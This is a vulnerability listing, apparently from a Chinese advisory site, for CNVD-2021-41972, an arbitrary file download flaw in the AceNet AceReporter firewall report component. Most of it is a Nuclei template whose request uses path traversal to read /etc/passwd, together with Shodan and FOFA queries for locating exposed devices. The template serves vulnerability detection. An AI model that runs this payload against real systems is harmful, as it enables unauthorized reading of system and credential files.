CNVD-2021-41972: AceNet AceReporter Report - Arbitrary File Download

日期: 2025-08-01 | 影响软件: AceNet AceReporter | POC: 已公开

漏洞描述

All firewall devices that use the AceNet AceReporter report component can download arbitrary files

PoC代码[已公开]

id: CNVD-2021-41972

info:
  name: AceNet AceReporter Report - Arbitrary File Download
  author: DhiyaneshDk
  severity: high
  description: |
    All firewall devices that use the AceNet AceReporter report component can download arbitrary files
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972
    - https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1595726841
    fofa-query: body="Login @ Reporter"
  tags: cnvd2021,cnvd,acenet,acereporter,lfi,vuln
variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - 'filename='
          - 'application/octet-stream'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402201ba916b0c4544103b475477e5f6a564ab8b94c92ba8c1cdcb3019cbc12547ba302207f8eb39fbad2fded34f26920ac79fd26ece02b70d94879825b5a478c877112df:922c64590222798bb761d5b6d8e72950

相关漏洞推荐